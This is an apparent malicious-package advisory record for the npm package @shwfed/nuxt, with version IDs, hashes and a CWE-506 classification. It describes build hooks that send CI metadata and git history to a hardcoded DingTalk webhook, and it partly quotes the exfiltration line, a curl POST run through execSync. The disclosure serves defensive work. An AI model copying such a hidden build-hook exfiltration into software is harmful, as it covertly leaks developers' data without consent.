-= Per source details. Do not edit below this line.=-
@shwfed/nuxt is published as a Nuxt UI module but contains undocumented build-hook code that, when a consumer integrates the module and runs a build under CI, POSTs the consumer's CI/build metadata and recent git history to a hardcoded third-party DingTalk webhook owned by the package author. In dist/module.mjs, the build:error and build:done Nuxt hooks invoke execSync("curl -s -X POST '${url}'... -d @-", { input: payload }) against https://oapi.dingtalk.com/robot/send with an embedded access_token (a01e0fdf...) and an embedded HMAC signing secret (SEC9d852...). The payload includes JOB_NAME, BUILD_NUMBER, branch name, RUN_DISPLAY_URL, build error message, the last 5 git log entries (commit subjects and author names) from the consumer's repository, and the last commit author. The destination is fixed in the source — not configurable, not documented, and unrelated to the module's advertised UI-component purpose. Any consumer that adds this module to their Nuxt config and runs CI builds leaks build status and recent git commit metadata (including third-party committer names) to the author's DingTalk channel without consent.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-004583",
"import_time": "2026-05-26T05:52:53.122336759Z",
"modified_time": "2026-05-25T05:18:56Z",
"sha256": "04c497e228a9ddf1560202c00b4a4a316bf4e44a76f032f35ac83da01ff5f866",
"source": "amazon-inspector",
"versions": [
"0.13.0"
]
},
{
"id": "IN-MAL-2026-004127",
"import_time": "2026-05-26T05:51:59.368592186Z",
"modified_time": "2026-05-22T03:05:41Z",
"sha256": "87ac343d6f89a601749bb115fa6902e7d39c71a0a6469690ecef56e9ea8a135e",
"source": "amazon-inspector",
"versions": [
"0.12.0"
]
},
{
"id": "IN-MAL-2026-004128",
"import_time": "2026-05-26T05:51:59.474234203Z",
"modified_time": "2026-05-22T03:05:56Z",
"sha256": "cc9864d615e6760cc4ce5f9037b93cb29a5f1c044cafa7736f7d3a953a42f6a4",
"source": "amazon-inspector",
"versions": [
"0.12.0"
]
},
{
"id": "IN-MAL-2026-004582",
"import_time": "2026-05-26T05:52:53.019303786Z",
"modified_time": "2026-05-25T05:18:52Z",
"sha256": "0bf4290eabdf1af188406fbba698fba9e3d85b7a976bd5cc6fb77b862c0c1b2e",
"source": "amazon-inspector",
"versions": [
"0.13.0"
]
},
{
"id": "IN-MAL-2026-006155",
"import_time": "2026-06-12T19:44:14.247531069Z",
"modified_time": "2026-06-12T19:10:05Z",
"sha256": "3336b06325a199568cd0fffee2cec27695d7e49be7d5cb333bcb3569ff846aec",
"source": "amazon-inspector",
"versions": [
"0.13.1"
]
},
{
"id": "IN-MAL-2026-006154",
"import_time": "2026-06-12T19:44:14.153049153Z",
"modified_time": "2026-06-12T19:10:05Z",
"sha256": "63b019ca84778d17faf6bd57d455e1af9c7a07535d8cba7f69456d14e81419b2",
"source": "amazon-inspector",
"versions": [
"0.13.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"domains": [
"34.3.16.104.in-addr.arpa"
],
"evidence_files": [
{
"path": "dist/module.mjs",
"sha256": "2d91b00b8b9a6d98315e3559a46c4ee852785dcb69d0af5ef0f97219878948ab",
"tlsh": "2ff1b71995a3352505f35911ab37280317be66436602fc14bf9e97d13f0f3a662f638d"
}
],
"package_integrity": [
{
"filename": "nuxt-0.12.0.tgz",
"hashes": {
"sha1": "2f6f7fb399d474dfd939876957be932a3de2c5db",
"sha512_sri": "sha512-I3QnOJgcJDni1yqr6e6HLxUtQwe9UPgoB/npYBSe7+x+3y9hI9yPbRjaTRwg536ymyXOU93blW7T9OJVmLUrlQ=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shwfed/nuxt/MAL-2026-4444.json"